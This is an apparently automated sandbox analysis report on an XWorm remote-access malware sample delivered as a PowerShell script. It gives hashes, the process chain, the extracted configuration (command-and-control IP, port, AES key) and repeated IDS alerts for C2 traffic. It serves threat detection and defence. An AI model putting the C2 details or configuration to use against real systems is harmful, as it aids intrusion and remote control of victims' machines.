Windows
Analysis Report
mhqxUdpe7V.ps1
Overview
General Information
Sample name: | mhqxUdpe7V.ps1renamed because original name is a hash value |
Original sample name: | 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1 |
Analysis ID: | 1577168 |
MD5: | d8e887ed6c14e9b9279b739aea8bb613 |
SHA1: | d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071 |
SHA256: | 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e |
Tags: | 92-255-57-155ps1user-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 3600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\mhq xUdpe7V.ps 1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 1820 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - RegSvcs.exe (PID: 3352 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 5 entries |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-18T08:15:44.383553+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:15:55.993778+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:15:58.442744+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:07.619210+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:19.244265+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:28.596948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:30.869806+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.540659+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.775609+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:35.966382+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:37.275818+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:47.024809+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:51.681721+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:51.872600+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:55.860763+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:16:58.870117+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:02.360638+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.338323+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.529526+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:07.798850+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:19.369699+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:28.636169+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:28.826358+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.009802+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.200715+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.366726+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.392547+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:30.683445+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:38.088186+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:41.526413+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:45.623108+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:57.260857+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:58.430043+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:08.930832+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.401150+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.591925+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.713869+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:15.259849+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:18.994275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:23.072270+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:28.444810+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:34.833814+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:36.479150+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:37.871432+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:45.510717+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:57.135572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:58.456985+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:08.793859+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:17.112172+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:21.167141+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:28.446368+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:30.432749+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-18T08:15:44.423184+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:15:55.995603+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:07.622697+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:19.246948+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:30.871894+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.586657+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.777466+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:35.971330+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:37.278095+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:47.027279+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:51.687517+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:51.874949+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:16:55.863013+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:02.363894+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.430548+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.550481+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:07.804066+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:19.371972+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:28.828701+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.202778+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.371295+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.491088+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:30.778035+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:38.091676+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:41.528389+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:45.634389+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:57.263162+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:08.932951+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.403176+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.594444+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.715630+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:15.262040+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:18.999823+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:23.074203+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:34.838093+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:36.481824+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:37.874173+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:45.514127+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:57.141141+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:08.800193+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:17.253400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:21.168994+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:30.433858+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-18T08:15:58.442744+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-18T08:18:22.639364+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process Stats: |
Source: | Code function: | 4_2_015EC2D8 | |
Source: | Code function: | 4_2_015EB598 | |
Source: | Code function: | 4_2_015E6498 | |
Source: | Code function: | 4_2_015E8618 | |
Source: | Code function: | 4_2_015E5BC8 | |
Source: | Code function: | 4_2_015E5880 | |
Source: | Code function: | 4_2_015E0FA0 |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Code function: | 0_2_00007FF887A5A0E9 | |
Source: | Code function: | 0_2_00007FF887A56FDD | |
Source: | Code function: | 0_2_00007FF887A5C757 | |
Source: | Code function: | 0_2_00007FF887A5AB67 |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
